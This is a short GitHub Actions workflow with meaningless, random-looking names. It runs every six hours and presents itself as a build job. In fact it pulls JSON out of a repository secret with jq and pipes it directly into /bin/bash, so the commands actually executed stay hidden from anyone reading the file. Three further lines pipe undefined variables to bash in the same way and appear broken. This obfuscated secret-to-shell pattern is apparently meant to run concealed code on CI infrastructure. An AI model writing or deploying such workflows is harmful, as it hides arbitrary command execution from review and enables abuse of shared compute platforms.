name: yingongfei2389
on:
  workflow_dispatch:
  schedule:
    - cron: '15 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yingongfei2389
        env:
          kzfl76: ${{ secrets.kzfl76 }}
        run: |
          echo $kzfl76 | jq -r .lf8 | /bin/bash
          echo $i6 | jq -r .gjb42227 | /bin/bash
          echo $i20 | jq -r .wml986 | /bin/bash
          echo $km8417 | jq -r .g8913 | /bin/bash

